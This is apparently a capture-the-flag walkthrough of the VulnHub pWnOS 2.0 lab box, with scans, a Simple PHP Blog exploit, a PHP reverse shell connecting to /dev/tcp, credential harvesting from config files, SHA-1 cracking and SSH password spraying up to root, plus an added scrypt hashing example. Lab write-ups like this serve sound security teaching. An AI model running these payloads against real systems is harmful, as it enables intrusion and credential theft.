pWnOS 2.0 box walkthrough (CMS penetration, PHP+MySQL website penetration, password reuse)

news 2024/11/29 8:37:00


Box introduction

A VulnHub box.

Local setup

Because of how this box is built, it cannot be discovered by a scan when its network adapter is in NAT mode; it turns out the NAT network address has to be changed first.

Reference method
https://blog.csdn.net/Bossfrank/article/details/131415257
Author's homepage
https://blog.csdn.net/Bossfrank?type=blog
PS: this UCAS master's student is really impressive, seriously impressive, learned a lot 🙏

nmap information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 10.10.10.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:37 CST
Nmap scan report for localhost (10.10.10.1)
Host is up (0.00035s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (10.10.10.2)
Host is up (0.00010s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00019s latency).
MAC Address: 00:0C:29:8D:63:FF (VMware)
Nmap scan report for localhost (10.10.10.128)
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for bogon (10.10.10.254)
Host is up (0.000068s latency).
MAC Address: 00:50:56:EB:94:F3 (VMware)
Nmap scan report for localhost (10.10.10.129)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.92 seconds
                                                                                                                                                                                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 CST
Nmap scan report for bogon (10.10.10.100)
Host is up (0.000045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:8D:63:FF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
                                                                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:8D:63:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
                                                                                                                                                                                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.09% done; ETC: 20:42 (0:00:08 remaining)
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.56% done; ETC: 20:44 (0:00:11 remaining)
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00034s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8D:63:FF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 395.77 seconds

Web penetration

The front page reads: “Welcome to this site. If you have any questions, please email admin@isints.com”
Directory brute-forcing

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://10.10.10.100
[sudo] password for kali:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Sep 29 23:08:26 2024
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6001)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5750)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5034)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5392)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/docs/ ----                                                                                           
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/flash/ ----                                                                                          
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/images/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/interface/ ----                                                                                      
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/languages/ ----                                                                                      
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/scripts/ ----                                                                                        
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/themes/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                       
-----------------                                                                                                                                      
END_TIME: Sun Sep 29 23:08:34 2024                                                                                                                     
DOWNLOADED: 9224 - FOUND: 30       

Try an injection against login.php:
' or 1=1 -- or ' or 1=1 #
Funny: it dumps the source code.

grep the brute-forced directory list for pages returning 200.
This looks like a content management system; find the CMS name.
At
view-source:http://10.10.10.100/blog/index.php
we find Simple PHP Blog 0.4.0.
Search the exploit database.

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                             20:49:59 [0/3]
└─$ sudo searchsploit simple php blog 0.4.0
[sudo] password for kali: 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                         | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                    | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                                                                             | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                                                                                                                | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                                                                                                            | php/webapps/16883.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ searchsploit simple php blog -m 1191   
[!] Could not find EDB-ID #


[!] Could not find EDB-ID #


[!] Could not find EDB-ID #


  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
    Codes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos2.0/1191.pl



┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ ls
1191.pl  dir.ori

sudo apt-get install libswitch-perl
________________________________________________________________________________                                                 
                  SimplePHPBlog v0.4.0 Exploits                                                                                  
                             by                                                                                                  
                     Kenneth F. Belva, CISSP                                                                                     
                   http://www.ftusecurity.com                                                                                                                                                                                                                      
________________________________________________________________________________                                                 
                                                                                                                                 
        Program : 1191.pl                                                                                                                                                                                                                                                                                                   
        Version : v0.1                                                                                                           
        Date    : 8/25/2005                                                                                                      
        Descript: This perl script demonstrates a few flaws in                                                                                                                                                                                                                                                              
                  SimplePHPBlog.                                                                                                                                                  
                                                                                                                                 
        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...                                                                   
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO                                                                                                                                                                                                                                                                                                   
                  NOT HAVE PERMISSION TO DO SO!                 
                                                                                                                                                                                                                                                                   
                  Please see this script comments for solution/fixes                                                                                          
                  to demonstrated vulnerabilities.                                                                                                            
                  http://www.simplephpblog.com                                                                                                                
                                                                                                                                                              
        Usage   : 1191.pl [-h host] [-e exploit]                                                                                                              
                                                                               
                -?      : this menu                                                                                                                           
                -h      : host                                                                                                                                
                -e      : exploit                                                        
                        (1)     : Upload cmd.php in [site]/images/                                                                                                                
                        (2)     : Retreive Password file (hash)                                                                                               
                        (3)     : Set New User Name and Password                                                                                              
                                [NOTE - uppercase switches for exploits]                                                                                      
                                -U      : user name                                                                                                                               
                                -P      : password                                                                                                                                                                                                                                                                          
                        (4)     : Delete a System File                                                                                                                            
                                -F      : Path and System File                                                                                                                    

        Examples: 1191.pl -h 127.0.0.1 -e 2                                              
                  1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t                                                                                                                       
                  1191.pl -h 127.0.0.1 -e 4 -F ./index.php                                                                                                                        
                  1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd                                                                                                                
                  1191.pl -h 127.0.0.1 -e 1   

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hugomc -P hugomc

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: hugomc
Password is set to: hugomc


*** Exploit Completed....
Have a nice day! :)

Upload a shell and get an initial shell.

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.129/1234 0>&1'"); ?>

Upload this shell.

Combined with the directory brute-force, the shell should be at http://10.10.10.100/blog/images/shell.php; start a listener, request it, and we get a shell.

Initial shell obtained.

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                     [0/41]
└─$ sudo ncat -lvnp 1234                         
[sudo] password for kali:  
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.100:34941.
bash: no job control in this shell
www-data@web:/var/www/blog/images$ 

Try privilege escalation.

www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link 
       valid_lft forever preferred_lft forever
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/images$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/images$ python --version
python --version
Python 2.7.1+
www-data@web:/var/www/blog/images$ 

Use python to upgrade to an interactive shell.

www-data@web:/var/www/blog/images$ python -c "import pty;pty.spawn('/bin/bash')"
<images$ python -c "import pty;pty.spawn('/bin/bash')"  

Look for sensitive files.

www-data@web:/var/www/blog/images$ pwd
pwd
/var/www/blog/images
www-data@web:/var/www/blog/images$ cd ..
cd ..
www-data@web:/var/www/blog$ ls
ls
add.php                 flash                   rate_cgi.php
add_block.php           image_list.php          rdf.php
add_cgi.php             images                  recompress.php
add_link.php            index.php               rss.php
add_static.php          info.php                scripts
add_static_cgi.php      install00.php           search.php
atom.php                install01.php           set_login.php
categories.php          install02.php           set_login_cgi.php
colors.php              install03.php           setup.php
colors_cgi.php          install03_cgi.php       setup_cgi.php
comment_add_cgi.php     interface               static.php
comment_delete_cgi.php  languages               stats.php
comments.php            languages.php           themes
config                  languages_cgi.php       themes.php
contact.php             login.php               trackback.php
contact_cgi.php         login_cgi.php           trackback_delete_cgi.php
content                 logout.php              upgrade.php
delete.php              options.php             upload_img.php
delete_static.php       options_cgi.php         upload_img_cgi.php
docs                    preview_cgi.php         upload_img_new.php
downgrade.php           preview_static_cgi.php
www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php

Looks like we found something.

www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$ 

Can't log in with it; are there other configuration files?

www-data@web:/var/www$ mysql -uroot -pgoodday
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

Yes: the database connection file in another location has different contents.

www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$ 

Successfully logged into MySQL.

www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Look at the database contents.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16                                                                 
use ch16
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

Look at the users table.

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

hash-identifier recognizes the password hash as SHA-1.

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                           
└─$ hash-identifier c2c4b4e51d9e23c02c15702c136c3e950ba9a4af                                                                                                                                               
   #########################################################################                                                                                                                               
   #     __  __                     __           ______    _____           #                                                                                                                               
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
-------------------------------------------------- 

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Got the password hash; try to crack the SHA-1.
The password is:

c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying
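Why that hash fell so easily, as an added example (not code from the write-up or from Simple PHP Blog): the `pass` column stores a plain, unsalted SHA-1, so one fast hash per guess is all a dictionary attack costs, and identical passwords give identical hashes across every deployment. The block below runs that dictionary check against the hash from the users table, then stores the same password with a salted, memory-hard KDF (`hashlib.scrypt`) to show what the application should have done. The candidate wordlist is constructed for this demo; `PAGE_HASH` is the only value taken from the write-up.

```python
"""Added example: unsalted SHA-1 (as found in ch16.users) versus salted scrypt.

The hash PAGE_HASH comes from the write-up's users table; the wordlist
CANDIDATES is constructed for this demo and is not a real dictionary.
"""
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Value from the write-up's `select * from users;` output (column `pass`).
PAGE_HASH = "c2c4b4e51d9e23c02c15702c136c3e950ba9a4af"

# Constructed wordlist standing in for a real dictionary.
CANDIDATES = ["password", "goodday", "root@ISIntS", "killerbeesareflying", "hugomc"]


def sha1_hex(word: str) -> str:
    """Plain unsalted SHA-1, the scheme hash-identifier reported for the table."""
    return hashlib.sha1(word.encode()).hexdigest()


def crack_sha1(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: one fast hash per guess and no salt, so a
    precomputed table or a GPU cracker makes this trivial at scale."""
    target = target_hex.lower()
    for word in candidates:
        if hmac.compare_digest(sha1_hex(word), target):
            return word
    return None


# --- what the application should have stored instead ---------------------

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted scrypt (RFC 7914) via hashlib; returns 'salt_hex$key_hex'.
    n=2**14, r=8 costs about 16 MiB of memory per guess."""
    salt = salt or os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return f"{salt.hex()}${key.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, _ = stored.split("$", 1)
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)


def crack_scrypt(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """The same dictionary attack against the scrypt record. It still succeeds
    when the password is in the list, but every guess now costs real memory
    and CPU, and the per-user salt removes any benefit from precomputation."""
    for word in candidates:
        if verify_password(word, stored):
            return word
    return None


if __name__ == "__main__":
    print("SHA-1 crack   :", crack_sha1(PAGE_HASH, CANDIDATES))
    record = hash_password("killerbeesareflying")
    print("scrypt record :", record)
    print("scrypt crack  :", crack_scrypt(record, CANDIDATES))
```

The takeaway for the application owner is not that scrypt makes a dictionary password safe (it does not; the same word is still found), but that the cost per guess moves from nanoseconds to tens of milliseconds and the salt forces the attacker to start over for every user.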

Check /etc/passwd to determine the user names.

www-data@web:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false 
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash

Password spraying

Try spraying the collected passwords against SSH.
Possible user names:

administrator
admin
dan
root
hugomc

Possible passwords:

killerbeesareflying
root@ISIntS
hugomc

Using crackmapexec, find a valid account and password.

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo crackmapexec ssh 10.10.10.100 -p passwords.lst -u users.lst --continue-on-success           
SSH         10.10.10.100    22     10.10.10.100     [*] SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] root:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [+] root:root@ISIntS (Pwn3d!)
SSH         10.10.10.100    22     10.10.10.100     [-] root:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:root@ISIntS Authentication failed.                                                                                                          
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:hugomc Authentication failed.     

Got it.

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo ssh root@10.10.10.100                                                                                                                                                     
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password: 
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Fri Aug  9 18:44:09 EDT 2024

  System load:  0.0               Processes:           77
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link 
       valid_lft forever preferred_lft forever


Check privileges.

root@web:~# sudo -l
Matching Defaults entries for root on this host:
    env_reset

User root may run the following commands on this host:
    (ALL : ALL) ALL


Summary

nmap scan: the target exposes ports 22 and 80.
Browsing port 80 together with directory brute-forcing shows a CMS running under /blog.
Looking at the pages reveals the CMS name and version, Simple PHP Blog 0.4.0; searchsploit is checked for an exploit script.
An exploit script exists; it creates a new account in the CMS, and the login with that account succeeds.
The admin panel's image upload is checked and accepts .php files, so a reverse shell is uploaded and a shell on the box is obtained.
With the initial shell, information gathering turns up two database connection files, one of which is the one the CMS is currently using. Trying its credentials logs into the database, which holds a SHA-1 hashed password that can be cracked.
After the password collision (dictionary cracking) the SSH login as root succeeds. It turns out the person who deployed the CMS reused the MySQL root password as the Linux root password 😓
